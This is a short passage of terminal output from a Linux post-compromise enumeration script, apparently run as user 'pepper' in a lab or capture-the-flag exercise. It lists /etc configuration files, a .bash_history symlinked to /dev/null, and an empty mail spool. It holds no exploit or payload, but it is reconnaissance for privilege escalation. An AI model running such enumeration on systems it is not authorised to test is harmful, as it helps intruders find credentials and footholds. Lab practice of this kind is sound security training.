-rw-r--r-- 1 root root 191 Apr 12  2017 /etc/libaudit.conf
-rw-r--r-- 1 root root 9 Aug  7  2006 /etc/host.conf
-rw-r--r-- 1 root root 3173 Jul  3  2018 /etc/reportbug.conf
-rw-r--r-- 1 root root 346 Feb 26  2018 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 604 Jun 26  2016 /etc/deluser.conf
-rw-r--r-- 1 root root 6790 Mar  2  2019 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 2584 Aug  1  2016 /etc/gai.conf
-rw-r--r-- 1 root root 497 Feb  6  2019 /etc/nsswitch.conf


[00;31m[-] Current user's history files:[00m
lrwxrwxrwx 1 root root 9 Mar  4  2019 /home/pepper/.bash_history -> /dev/null


[00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/pepper/.bash_history


[00;31m[-] Any interesting mail in /var/mail:[00m
total 8
drwxrwsr-x  2 root mail 4096 Mar  2  2019 .
drwxr-xr-x 12 root root 4096 Mar  2  2019 ..


[00;33m### SCAN COMPLETE ####################################[00m
